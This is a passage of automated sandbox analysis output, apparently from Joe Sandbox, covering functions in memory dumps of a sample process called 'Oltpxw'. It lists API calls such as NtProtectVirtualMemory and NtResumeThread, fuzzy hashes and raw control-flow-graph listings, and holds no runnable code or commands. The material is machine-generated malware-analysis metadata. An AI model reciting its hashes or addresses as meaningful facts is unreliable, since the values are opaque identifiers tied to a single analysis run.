                                                • Opcode ID: 2c37fa507280ecc7660922e4624c61811df846d7e5bdd0481d35205f8e477ade
                                                • Instruction ID: 1567eba875af728b9114584c0d877c33de7fc925b8fb7bd4c6aef475b974a126
                                                • Opcode Fuzzy Hash: 2c37fa507280ecc7660922e4624c61811df846d7e5bdd0481d35205f8e477ade
                                                • Instruction Fuzzy Hash: 95C2A5B4E002298FDB65DF68D984B99BBB5FB88304F1081E9D50DA7355DB30AE85CF90
                                                Function 06564EE0 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06564F71
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: MemoryProtectVirtual
                                                • String ID:
                                                • API String ID: 2706961497-0
                                                • Opcode ID: 8a565a4657151077582e825ae23be7422607b03bf662bf7814185d77e0b426c0
                                                • Instruction ID: bd5a3b847e5d4a4477ed8acb4f89b71f12d221703a765a7257a8285cdd4e5042
                                                • Opcode Fuzzy Hash: 8a565a4657151077582e825ae23be7422607b03bf662bf7814185d77e0b426c0
                                                • Instruction Fuzzy Hash: 8421F6B5D012499FCB10DFAAD984ADEFBF9FF48310F10842AE919A7250C7759940CBA5
                                                Function 06564EE8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06564F71
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: MemoryProtectVirtual
                                                • String ID:
                                                • API String ID: 2706961497-0
                                                • Opcode ID: e7b19ba4353921360d8ba2414193de55c0bd7b99a611a3383c881cd32103ffed
                                                • Instruction ID: 5b4dc6e607c57d38dd5980de3bc16e1e3d4f748ec9bb595a24691b9f8ddfb0cd
                                                • Opcode Fuzzy Hash: e7b19ba4353921360d8ba2414193de55c0bd7b99a611a3383c881cd32103ffed
                                                • Instruction Fuzzy Hash: 1321E3B5D013499FCB10DFAAD984AEEFBF5FF48310F20842AE519A7250C775A940CBA5
                                                Function 06565FC8 Relevance: 1.6, APIs: 1, Instructions: 61nativethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 0656603E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: e9073955aa8d80f7f623961817bbb5c6dfc1f26d6298f2e0745c5f06bd964431
                                                • Instruction ID: cea95ceab10af4e8cc49bfcad70bbb1af939fb5e54335082030077b39786533c
                                                • Opcode Fuzzy Hash: e9073955aa8d80f7f623961817bbb5c6dfc1f26d6298f2e0745c5f06bd964431
                                                • Instruction Fuzzy Hash: D71129B1D002099BDB20DFAAC984ADFFBF8EF48320F10842AD419A7240CB755944CFA1
                                                Function 06565FD0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 0656603E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 8d1795401168a9390d94e8d72e46421f088c5f93dd509e6c8d458ae204467b21
                                                • Instruction ID: 8fdda68646ef66b804055be4be449be0cf4c08685fa2828397f4de40b63978f7
                                                • Opcode Fuzzy Hash: 8d1795401168a9390d94e8d72e46421f088c5f93dd509e6c8d458ae204467b21
                                                • Instruction Fuzzy Hash: EA1129B1D002098FDB20DFAAC9847AEFBF4FF58320F14842AD519A7240CB75A944CFA5
                                                Function 0682D9F0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2349412832.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Dlq
                                                • API String ID: 0-3914526553
                                                • Opcode ID: afbb60ab2d8019549a4faaf1982b0c55a89a467f2bc9085d6b79a530a625eb24
                                                • Instruction ID: 83af9c426ad7432f808bd0c62d0c4238ea93cbb60974b5c0d23720deade947df
                                                • Opcode Fuzzy Hash: afbb60ab2d8019549a4faaf1982b0c55a89a467f2bc9085d6b79a530a625eb24
                                                • Instruction Fuzzy Hash: 95D1B078E00219CFDB54DFA9D990A9DBBB2FF89300F1081A9D409AB365DB35AD85CF50
                                                Function 063DCC08 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: 8b37d05f750d90b21e2d973911d5d9aa120d514731550fb007b095b98c571e32
                                                • Instruction ID: 9402ddf725031fe531be394630e74ee85557643624060187f677526a53b3827d
                                                • Opcode Fuzzy Hash: 8b37d05f750d90b21e2d973911d5d9aa120d514731550fb007b095b98c571e32
                                                • Instruction Fuzzy Hash: ACB137B1E15208CFEB54CFA9E984B9DBBFAFF89300F10A16AD009A7251D7705985CF80
                                                Function 063DCBF8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: cf178809fef83b4719f660c6cb03397d57359dc1ab8d4d52ec4c97984214dcda
                                                • Instruction ID: 03001039012d4ca582413468c60e1f89b6927b0aef24c51fb6abf1c7d49067a3
                                                • Opcode Fuzzy Hash: cf178809fef83b4719f660c6cb03397d57359dc1ab8d4d52ec4c97984214dcda
                                                • Instruction Fuzzy Hash: DFB137B5E15208CFEB54CFA9E984B9DBBFAFF89300F10A16AD009A7251D7305985CF80
                                                Function 063D142C Relevance: .5, Instructions: 471COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74f6bd9e542ba2a2ccb796a965ee663e9e1900ad72020b8d5b231c1954e1239b
                                                • Instruction ID: 624a4294b515d848425c13cc7eb1f37dc76b99aefdaecf3849e2cc50ab3fe48b
                                                • Opcode Fuzzy Hash: 74f6bd9e542ba2a2ccb796a965ee663e9e1900ad72020b8d5b231c1954e1239b
                                                • Instruction Fuzzy Hash: AF32A374A142298FCBA5DF28D984B99B7B6FF48300F1091E9E50DA7355DB30AE81CF94
                                                Function 063DBF58 Relevance: .3, Instructions: 328COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 584bab593f12c1806e58e11e43572dac44e5c23aa3073523b6f5359e95962551
                                                • Instruction ID: e7da4033d914094564280e4690ef629f44763f2981d717f645e51b6ddfa96169
                                                • Opcode Fuzzy Hash: 584bab593f12c1806e58e11e43572dac44e5c23aa3073523b6f5359e95962551
                                                • Instruction Fuzzy Hash: 1EE15BB5D14218CFEB94CFA9E884BADBBFAFF49304F1090A9D009A7255D7354985CF80
                                                Function 063DBF49 Relevance: .3, Instructions: 315COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 354535efcf2bfbea3bdcf08daccf57e4301cfa92a21b73633df8fc93277d6cce
                                                • Instruction ID: 3f2806fc9288164308c2bd84f088cebe8502ac8a26d6728d07ab7e2c42aacf33
                                                • Opcode Fuzzy Hash: 354535efcf2bfbea3bdcf08daccf57e4301cfa92a21b73633df8fc93277d6cce
                                                • Instruction Fuzzy Hash: DAE159B4D14218CFEB94CFA9E884B9DBBFAFF89304F1090A9D009A7255DB755985CF80
                                                Function 063D0006 Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71256745eaa4056f1c6b8f89cfb80fdbaeb58ba7f1328213f807c60eee3c0de7
                                                • Instruction ID: 26b026d99ac38969c6cf8e855c0da4786d82914bb7608dca8a3e937be43d99e9
                                                • Opcode Fuzzy Hash: 71256745eaa4056f1c6b8f89cfb80fdbaeb58ba7f1328213f807c60eee3c0de7
                                                • Instruction Fuzzy Hash: E051FFB1E056198BEB19CF6BD84069AFBF7AFC9300F14C0BAD508AB255DB340986CF54
                                                Function 0281A7C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 895 281a7c8-281a7d7 896 281a803-281a807 895->896 897 281a7d9-281a7e6 call 2818a84 895->897 898 281a809-281a813 896->898 899 281a81b-281a85c 896->899 904 281a7e8 897->904 905 281a7fc 897->905 898->899 906 281a869-281a877 899->906 907 281a85e-281a866 899->907 952 281a7ee call 281aa51 904->952 953 281a7ee call 281aa60 904->953 905->896 908 281a879-281a87e 906->908 909 281a89b-281a89d 906->909 907->906 913 281a880-281a887 call 2819af4 908->913 914 281a889 908->914 912 281a8a0-281a8a7 909->912 910 281a7f4-281a7f6 910->905 911 281a938-281a9f8 910->911 945 281aa00-281aa2b GetModuleHandleW 911->945 946 281a9fa-281a9fd 911->946 915 281a8b4-281a8bb 912->915 916 281a8a9-281a8b1 912->916 918 281a88b-281a899 913->918 914->918 919 281a8c8-281a8d1 call 2819b04 915->919 920 281a8bd-281a8c5 915->920 916->915 918->912 926 281a8d3-281a8db 919->926 927 281a8de-281a8e3 919->927 920->919 926->927 928 281a901-281a905 927->928 929 281a8e5-281a8ec 927->929 950 281a908 call 281ad30 928->950 951 281a908 call 281ad60 928->951 929->928 931 281a8ee-281a8fe call 2819b14 call 2819b24 929->931 931->928 932 281a90b-281a90e 935 281a931-281a937 932->935 936 281a910-281a92e 932->936 936->935 947 281aa34-281aa48 945->947 948 281aa2d-281aa33 945->948 946->945 948->947 950->932 951->932 952->910 953->910
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2320843093.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: 8S$8S
                                                • API String ID: 4139908857-2685500511
                                                • Opcode ID: e06cfbcbf82778c681ec40fe40ff49d1784119c2d5c1c61b3a9a7c2cbcf49c71
                                                • Instruction ID: 049866525e70df658b885fba11e043729fc411164dd4f7b6b6601cf43aa5732a
                                                • Opcode Fuzzy Hash: e06cfbcbf82778c681ec40fe40ff49d1784119c2d5c1c61b3a9a7c2cbcf49c71
                                                • Instruction Fuzzy Hash: CD7145B8A01B058FDB28DF29D05075ABBF5FF88704F00892DD48AD7A80D774E946CB91
                                                Function 063DD1C0 Relevance: 4.2, Strings: 3, Instructions: 482COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 954 63dd1c0-63dd1e8 956 63dd1ea-63dd231 954->956 957 63dd236-63dd244 954->957 1000 63dd68d-63dd694 956->1000 958 63dd246-63dd251 957->958 959 63dd253 957->959 961 63dd255-63dd25c 958->961 959->961 962 63dd345-63dd349 961->962 963 63dd262-63dd266 961->963 967 63dd39f-63dd3a9 962->967 968 63dd34b-63dd35a 962->968 965 63dd26c-63dd270 963->965 966 63dd695-63dd6bd 963->966 970 63dd282-63dd2e0 965->970 971 63dd272-63dd27c 965->971 974 63dd6c4-63dd6ee 966->974 972 63dd3ab-63dd3ba 967->972 973 63dd3e2-63dd408 967->973 980 63dd35e-63dd363 968->980 1010 63dd2e6-63dd340 970->1010 1011 63dd753-63dd77d 970->1011 971->970 971->974 985 63dd6f6-63dd70c 972->985 986 63dd3c0-63dd3dd 972->986 991 63dd40a-63dd413 973->991 992 63dd415 973->992 974->985 987 63dd35c 980->987 988 63dd365-63dd39a 980->988 1008 63dd714-63dd74c 985->1008 986->1000 987->980 988->1000 999 63dd417-63dd43f 991->999 992->999 1014 63dd445-63dd45e 999->1014 1015 63dd510-63dd514 999->1015 1008->1011 1010->1000 1018 63dd77f-63dd785 1011->1018 1019 63dd787-63dd78d 1011->1019 1014->1015 1041 63dd464-63dd473 1014->1041 1020 63dd58e-63dd598 1015->1020 1021 63dd516-63dd52f 1015->1021 1018->1019 1027 63dd78e-63dd7cb 1018->1027 1024 63dd59a-63dd5a4 1020->1024 1025 63dd5f5-63dd5fe 1020->1025 1021->1020 1045 63dd531-63dd540 1021->1045 1039 63dd5aa-63dd5bc 1024->1039 1040 63dd5a6-63dd5a8 1024->1040 1029 63dd636-63dd683 1025->1029 1030 63dd600-63dd62e 1025->1030 1052 63dd68b 1029->1052 1030->1029 1046 63dd5be-63dd5c0 1039->1046 1040->1046 1053 63dd48b-63dd4a0 1041->1053 1054 63dd475-63dd47b 1041->1054 1066 63dd558-63dd563 1045->1066 1067 63dd542-63dd548 1045->1067 1050 63dd5ee-63dd5f3 1046->1050 1051 63dd5c2-63dd5c6 1046->1051 1050->1024 1050->1025 1056 63dd5c8-63dd5e1 1051->1056 1057 63dd5e4-63dd5e7 1051->1057 1052->1000 1064 63dd4d4-63dd4dd 1053->1064 1065 63dd4a2-63dd4ce 1053->1065 1060 63dd47d 1054->1060 1061 63dd47f-63dd481 1054->1061 1056->1057 1057->1050 1060->1053 1061->1053 1064->1011 1071 63dd4e3-63dd50a 1064->1071 1065->1008 1065->1064 1066->1011 1068 63dd569-63dd58c 1066->1068 1072 63dd54c-63dd54e 1067->1072 1073 63dd54a 1067->1073 1068->1020 1068->1045 1071->1015 1071->1041 1072->1066 1073->1066
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hiq$Hiq$Hiq
                                                • API String ID: 0-3012148416
                                                • Opcode ID: cc6c413897b9b6d559bf0a7591885b19be978f6f42f0b465da543e83a4c14a3a
                                                • Instruction ID: d7f2b868fece2d5b630bc22987c4c1b2f243d3cc9ec5cdbdf1b087f9f9ecd321
                                                • Opcode Fuzzy Hash: cc6c413897b9b6d559bf0a7591885b19be978f6f42f0b465da543e83a4c14a3a
                                                • Instruction Fuzzy Hash: 7C129071A002059FCBA4DFA5D894A6EBBF6FF84310F14852DE50A9B391DB35EC46CB90
                                                Function 063DEE88 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1084 63dee88-63deec5 1086 63deee7-63deefd call 63dec90 1084->1086 1087 63deec7-63deeca 1084->1087 1093 63df273-63df287 1086->1093 1094 63def03-63def0f 1086->1094 1202 63deecc call 63df7f8 1087->1202 1203 63deecc call 63df7ea 1087->1203 1204 63deecc call 63df7c2 1087->1204 1089 63deed2-63deed4 1089->1086 1091 63deed6-63deede 1089->1091 1091->1086 1105 63df2c7-63df2d0 1093->1105 1095 63def15-63def18 1094->1095 1096 63df040-63df047 1094->1096 1097 63def1b-63def24 1095->1097 1098 63df04d-63df056 1096->1098 1099 63df176-63df1b0 call 63de698 1096->1099 1101 63df368 1097->1101 1102 63def2a-63def3e 1097->1102 1098->1099 1104 63df05c-63df168 call 63de698 call 63dec28 call 63de698 1098->1104 1198 63df1b3 call 6510a70 1099->1198 1199 63df1b3 call 6510a60 1099->1199 1112 63df36d-63df371 1101->1112 1117 63def44-63defd9 call 63dec90 * 2 call 63de698 call 63dec28 call 63decd0 call 63ded78 call 63dede0 1102->1117 1118 63df030-63df03a 1102->1118 1195 63df16a 1104->1195 1196 63df173-63df174 1104->1196 1106 63df295-63df29e 1105->1106 1107 63df2d2-63df2d9 1105->1107 1106->1101 1114 63df2a4-63df2b6 1106->1114 1110 63df2db-63df31e call 63de698 1107->1110 1111 63df327-63df32e 1107->1111 1110->1111 1115 63df330-63df340 1111->1115 1116 63df353-63df366 1111->1116 1120 63df37c 1112->1120 1121 63df373 1112->1121 1128 63df2b8-63df2bd 1114->1128 1129 63df2c6 1114->1129 1115->1116 1134 63df342-63df34a 1115->1134 1116->1112 1175 63deff8-63df02b call 63dede0 1117->1175 1176 63defdb-63deff3 call 63ded78 call 63de698 call 63de948 1117->1176 1118->1096 1118->1097 1127 63df37d 1120->1127 1121->1120 1127->1127 1200 63df2c0 call 6511210 1128->1200 1201 63df2c0 call 6511200 1128->1201 1129->1105 1134->1116 1142 63df1b9-63df26a call 63de698 1142->1093 1175->1118 1176->1175 1195->1196 1196->1099 1198->1142 1199->1142 1200->1129 1201->1129 1202->1089 1203->1089 1204->1089
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq$4'eq
                                                • API String ID: 0-3023824364
                                                • Opcode ID: 71ebd9ddcfb326ec4eb8d53ff560ac50dbab2292180f9e668bbb1e12e638557a
                                                • Instruction ID: 2024847fadd987b16e93384164f65636ab53c6fb105833bd92fad85a64ec3b47
                                                • Opcode Fuzzy Hash: 71ebd9ddcfb326ec4eb8d53ff560ac50dbab2292180f9e668bbb1e12e638557a
                                                • Instruction Fuzzy Hash: B0F1EB35B00218CFDB44DFA4D999A9DBBB2FF89301F118558E506AB3A5DB70EC46CB80
                                                Function 065802DE Relevance: 3.8, Strings: 3, Instructions: 45COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1803 65802de-6580322 1824 6580325 call 6565e20 1803->1824 1825 6580325 call 6565e18 1803->1825 1805 6580327-6580334 1806 6581139-658116f 1805->1806 1807 658033a-658035c 1805->1807 1808 658017d-6580186 1806->1808 1811 6581175-6581180 1806->1811 1807->1808 1809 6580362-658036d 1807->1809 1812 6580188-65806d0 1808->1812 1813 658018f-6581103 1808->1813 1809->1808 1811->1808 1812->1808 1823 65806d6-65806e1 1812->1823 1813->1808 1821 6581109-6581114 1813->1821 1821->1808 1823->1808 1824->1805 1825->1805
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348904201.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6580000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !$'$4
                                                • API String ID: 0-4170026166
                                                • Opcode ID: 0280ba253a3c7b0d8c7d59a434e456dfe6d58fa58d6ef2f992a03e11cb2797ae
                                                • Instruction ID: bcf2045679090edaa5fd83302eab860792ece8756267c695268e3d974f3eb1c7
                                                • Opcode Fuzzy Hash: 0280ba253a3c7b0d8c7d59a434e456dfe6d58fa58d6ef2f992a03e11cb2797ae
                                                • Instruction Fuzzy Hash: 7921CEB4905269CFDBA0DF58C884BECBBB1BB08358F0040EAD908A7695D7765EC9DF40
                                                Function 06351DA8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1907 6351da8-6351dd3 1908 6351dd5 1907->1908 1909 6351dda-6351df9 1907->1909 1908->1909 1910 6351dfb-6351e04 1909->1910 1911 6351e1a 1909->1911 1912 6351e06-6351e09 1910->1912 1913 6351e0b-6351e0e 1910->1913 1914 6351e1d-6351e21 1911->1914 1915 6351e18 1912->1915 1913->1915 1916 63523dc-63523f3 1914->1916 1915->1914 1918 6351e26-6351e2a 1916->1918 1919 63523f9-63523fd 1916->1919 1920 6351e2c-6351e87 1918->1920 1921 6351e2f-6351e33 1918->1921 1922 6352432-6352436 1919->1922 1923 63523ff-635242f 1919->1923 1932 6351e8c-6351e90 1920->1932 1933 6351e89-6351ee5 1920->1933 1927 6351e35-6351e59 1921->1927 1928 6351e5c-6351e7e 1921->1928 1924 6352457 1922->1924 1925 6352438-6352441 1922->1925 1923->1922 1931 635245a-6352460 1924->1931 1929 6352443-6352446 1925->1929 1930 6352448-635244b 1925->1930 1927->1928 1928->1916 1935 6352455 1929->1935 1930->1935 1938 6351e92-6351eb6 1932->1938 1939 6351eb9-6351edc 1932->1939 1942 6351ee7-6351f48 1933->1942 1943 6351eea-6351eee 1933->1943 1935->1931 1938->1939 1939->1916 1952 6351f4d-6351f51 1942->1952 1953 6351f4a-6351fa6 1942->1953 1948 6351f17-6351f2e 1943->1948 1949 6351ef0-6351efd 1943->1949 1962 6351f30-6351f36 1948->1962 1963 6351f3e-6351f3f 1948->1963 1972 6351f06-6351f14 1949->1972 1959 6351f53-6351f77 1952->1959 1960 6351f7a-6351f9d 1952->1960 1964 6351fa8-6352004 1953->1964 1965 6351fab-6351faf 1953->1965 1959->1960 1960->1916 1962->1963 1963->1916 1973 6352006-6352062 1964->1973 1974 6352009-635200d 1964->1974 1969 6351fb1-6351fd5 1965->1969 1970 6351fd8-6351ffb 1965->1970 1969->1970 1970->1916 1972->1948 1983 6352064-63520c0 1973->1983 1984 6352067-635206b 1973->1984 1979 6352036-6352059 1974->1979 1980 635200f-6352033 1974->1980 1979->1916 1980->1979 1993 63520c5-63520c9 1983->1993 1994 63520c2-6352123 1983->1994 1989 6352094-63520b7 1984->1989 1990 635206d-6352091 1984->1990 1989->1916 1990->1989 1999 63520f2-6352109 1993->1999 2000 63520cb-63520ef 1993->2000 2003 6352125-635218d 1994->2003 2004 6352128-635212c 1994->2004 2013 6352119-635211a 1999->2013 2014 635210b-6352111 1999->2014 2000->1999 2015 6352192-6352196 2003->2015 2016 635218f-63521f7 2003->2016 2008 6352161-6352184 2004->2008 2009 635212e-635215e 2004->2009 2008->1916 2009->2008 2013->1916 2014->2013 2019 6352198-63521c8 2015->2019 2020 63521cb-63521ee 2015->2020 2024 63521fc-6352200 2016->2024 2025 63521f9-6352261 2016->2025 2019->2020 2020->1916 2028 6352235-6352258 2024->2028 2029 6352202-6352232 2024->2029 2034 6352266-635226a 2025->2034 2035 6352263-63522cb 2025->2035 2028->1916 2029->2028 2038 635226c-635229c 2034->2038 2039 635229f-63522c2 2034->2039 2044 63522d0-63522d4 2035->2044 2045 63522cd-6352335 2035->2045 2038->2039 2039->1916 2048 63522d6-6352306 2044->2048 2049 6352309-635232c 2044->2049 2054 6352337-635239c 2045->2054 2055 635233a-635233e 2045->2055 2048->2049 2049->1916 2064 63523d1-63523d4 2054->2064 2065 635239e-63523ce 2054->2065 2057 6352340-6352370 2055->2057 2058 6352373-6352396 2055->2058 2057->2058 2058->1916 2064->1916 2065->2064
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2347750257.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6350000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq
                                                • API String ID: 0-907361030
                                                • Opcode ID: 7a636674ac73763d0de3a23815d05264c98ec163ff58ebe25231a3ccca7a50bf
                                                • Instruction ID: 6e7c59ae54ae24b04894347647bb142de36d3b38ccd4fe36fa553183490702b0
                                                • Opcode Fuzzy Hash: 7a636674ac73763d0de3a23815d05264c98ec163ff58ebe25231a3ccca7a50bf
                                                • Instruction Fuzzy Hash: F4221634D01219CFDB94DFA9C954AADBBB6BF4A301F508169D80ABB394CB395E49CF40
                                                Function 06351598 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2166 6351598-63515bd 2168 63515c4-63515e1 2166->2168 2169 63515bf 2166->2169 2170 63515e3-63515ec 2168->2170 2171 6351602 2168->2171 2169->2168 2172 63515f3-63515f6 2170->2172 2173 63515ee-63515f1 2170->2173 2174 6351605-6351609 2171->2174 2175 6351600 2172->2175 2173->2175 2176 6351824-635183b 2174->2176 2175->2174 2178 6351841-6351845 2176->2178 2179 635160e-6351612 2176->2179 2182 6351847-635186c 2178->2182 2183 635186f-6351873 2178->2183 2180 6351614-63516b2 2179->2180 2181 635161a-635161e 2179->2181 2193 63516b4-6351752 2180->2193 2194 63516ba-63516be 2180->2194 2185 6351620-635162d 2181->2185 2186 6351648-635166d 2181->2186 2182->2183 2187 6351875-635187e 2183->2187 2188 6351894 2183->2188 2250 6351630 call 6516e70 2185->2250 2251 6351630 call 6516e80 2185->2251 2214 635166f-6351678 2186->2214 2215 635168e 2186->2215 2191 6351885-6351888 2187->2191 2192 6351880-6351883 2187->2192 2190 6351897-635189d 2188->2190 2195 6351892 2191->2195 2192->2195 2202 6351754-63517ef 2193->2202 2203 635175a-635175e 2193->2203 2198 63516c0-63516e5 2194->2198 2199 63516e8-635170d 2194->2199 2195->2190 2198->2199 2227 635170f-6351718 2199->2227 2228 635172e 2199->2228 2212 63517f1-6351816 2202->2212 2213 6351819-635181c 2202->2213 2205 6351760-6351785 2203->2205 2206 6351788-63517ad 2203->2206 2205->2206 2237 63517af-63517b8 2206->2237 2238 63517ce 2206->2238 2208 6351636-6351645 2208->2186 2212->2213 2213->2176 2217 635167f-6351682 2214->2217 2218 635167a-635167d 2214->2218 2219 6351691-6351698 2215->2219 2224 635168c 2217->2224 2218->2224 2225 63516a8-63516a9 2219->2225 2226 635169a-63516a0 2219->2226 2224->2219 2225->2176 2226->2225 2233 635171f-6351722 2227->2233 2234 635171a-635171d 2227->2234 2235 6351731-6351738 2228->2235 2239 635172c 2233->2239 2234->2239 2240 6351748-6351749 2235->2240 2241 635173a-6351740 2235->2241 2242 63517bf-63517c2 2237->2242 2243 63517ba-63517bd 2237->2243 2244 63517d1-63517d8 2238->2244 2239->2235 2240->2176 2241->2240 2247 63517cc 2242->2247 2243->2247 2248 63517e8-63517e9 2244->2248 2249 63517da-63517e0 2244->2249 2247->2244 2248->2176 2249->2248 2250->2208 2251->2208
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2347750257.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6350000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq
                                                • API String ID: 0-907361030
                                                • Opcode ID: cf1e376e27103ffe775de3f23db5e8d1902355ea5eee4b3bdc2e1777c4b9b028
                                                • Instruction ID: bb454382af115459c750d57d7b2396f6081173805871cf27c273dd8a4896d480
                                                • Opcode Fuzzy Hash: cf1e376e27103ffe775de3f23db5e8d1902355ea5eee4b3bdc2e1777c4b9b028
